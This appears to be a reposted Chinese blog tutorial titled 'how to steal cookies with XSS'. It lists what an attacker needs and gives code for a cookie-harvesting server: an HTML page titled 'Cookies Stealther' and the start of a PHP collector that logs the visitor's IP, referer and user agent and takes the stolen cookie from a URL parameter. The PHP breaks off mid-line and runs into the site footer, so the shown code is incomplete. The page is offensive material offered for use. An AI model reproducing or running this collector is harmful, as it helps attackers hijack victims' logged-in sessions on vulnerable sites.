利用xss偷cookie的方法

来源:韦江代博客 责任编辑:栏目编辑 发表时间:2013-07-01 11:37 点击:
最近 flash xss/csrf 很火 大家可以配合使用


使用的工具

1.免费网页支援PHP

2.存在xss的脆弱的网站。


vb.php为存放cookie的网页

vb.php 代码:


<head>
<
meta http-equiv="Content-Language" content="it">
<
title>Cookies Stealther - Designed and programmed by R00t[ATI]</title>
</
head>

<
body bgcolor="#C0C0C0">

<
p align="center"><font color="#FF0000">COOKIES STEALTHER</font></p>
<
p align="center"><font face="Arial" color="#FF0000">By R00T[ATI]</font></p>
<
p align="left">&nbsp;</p>

</
body>  




documents.php取得cookie的网页

documents.php 代码:

<?php

$ip
= $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];

$data = $_GET[c];

$time =

    相关新闻>>

      发表评论
      请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
      用户名: 验证码:点击我更换图片
      最新评论 更多>>
      网站首页 - 友情链接 - 网站地图 - TAG标签 - RSS订阅 - 内容搜索
      Copyright © 2008-2015 计算机技术学习交流网. 版权所有

      豫ICP备11007008号-1